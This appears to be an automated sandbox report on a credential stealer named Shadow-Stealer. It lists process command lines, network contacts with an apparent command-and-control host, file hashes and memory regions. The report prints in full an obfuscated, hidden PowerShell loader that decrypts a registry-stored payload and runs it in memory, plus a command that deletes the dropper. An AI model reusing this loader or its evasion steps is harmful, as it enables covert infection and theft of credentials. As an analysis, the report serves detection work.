C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0cc47aee-eff0-44b1-97f1-9416740d7066}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{434b7f4c-fa61-4893-8674-91e9cd4cc07c}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4412).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7ac2fcf6-df41-4e6c-80b8-3adea0e4e47f}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{b3ce56a7-3dc2-4b11-a182-4d9791847af7}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 8216c7e817dc85b88383948d9e7e28ac VMJrbeTaJ0G1DybUOifXVA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b879126d-8cf5-4c2b-b6d9-6915a8143f0c}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f70e4420-17c5-4f8e-974f-ca3e9967d023}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{3fce8478-2aeb-41e4-b9bf-445004fff2bf}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{92065d3a-77a7-4f50-a8a7-b540b9534d06}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{0306a8e1-83b4-42d4-a136-ac3bfeeb0071}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6ec409ea-6d44-48f3-b240-95121d6d6770}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{b76abe11-ac6d-44f4-8bc3-89f4a2cd0deb}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5768 -ip 5768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 348

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{9cdf0982-38de-4678-8700-92db4785501a}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 628 -p 1936 -ip 1936

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{5f048d43-35e8-408a-8ea7-73eb8d867e71}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1936 -s 308

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5df2f5a1-bd19-493b-a650-f7dcb18bb688}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{04d81b6e-83b1-41af-90ca-844cf5ae2e8c}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{41c1cf6f-f0a4-4979-8f69-f9a2cf66c5aa}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2dce2926-c616-4f80-b725-fa065fb39b01}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3524 -ip 3524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 456

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/5080-4-0x00007FF840763000-0x00007FF840765000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whthxgue.lxt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5080-14-0x0000018474900000-0x0000018474922000-memory.dmp

memory/5080-15-0x00007FF840760000-0x00007FF841221000-memory.dmp

memory/5080-16-0x00007FF840760000-0x00007FF841221000-memory.dmp

memory/5080-17-0x0000018418000000-0x0000018418024000-memory.dmp

memory/5080-19-0x00007FF85F110000-0x00007FF85F1CE000-memory.dmp

memory/5080-18-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/5080-20-0x0000018400300000-0x0000018400D50000-memory.dmp

memory/5080-22-0x0000018400D50000-0x0000018400DF6000-memory.dmp

memory/5080-23-0x0000018400E00000-0x0000018400E56000-memory.dmp

memory/5080-24-0x0000018400E60000-0x0000018400EB8000-memory.dmp

memory/5080-25-0x0000018400EC0000-0x0000018400EE2000-memory.dmp

memory/5080-28-0x00000184011A0000-0x00000184011AA000-memory.dmp

memory/5080-26-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2400-29-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2400-31-0x0000000140000000-0x0000000140004000-memory.dmp

memory/3284-32-0x0000000000400000-0x0000000000406000-memory.dmp

memory/3284-34-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

C:\Windows\$sxr-cmd.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

memory/4412-57-0x000001D59A3D0000-0x000001D59A3F4000-memory.dmp

memory/4412-58-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/4412-59-0x00007FF85F110000-0x00007FF85F1CE000-memory.dmp

memory/4412-60-0x000001D59A740000-0x000001D59ACC6000-memory.dmp

memory/4412-61-0x000001D5A2DA0000-0x000001D5A356A000-memory.dmp

memory/4412-62-0x000001D5A3570000-0x000001D5A39AE000-memory.dmp

memory/4412-63-0x000001D5A39B0000-0x000001D5A3A62000-memory.dmp

memory/4412-64-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/4412-72-0x000001D5FE3A0000-0x000001D5FE3F0000-memory.dmp

memory/4412-73-0x000001D5FE700000-0x000001D5FE7B2000-memory.dmp

memory/4412-74-0x000001D5FE990000-0x000001D5FEB52000-memory.dmp

memory/4412-84-0x000001D5FE3F0000-0x000001D5FE42C000-memory.dmp

memory/4412-85-0x000001D59B840000-0x000001D59B88E000-memory.dmp

memory/4412-87-0x00007FF85F110000-0x00007FF85F1CE000-memory.dmp

memory/4412-86-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/4412-88-0x000001D59BB50000-0x000001D59BB86000-memory.dmp

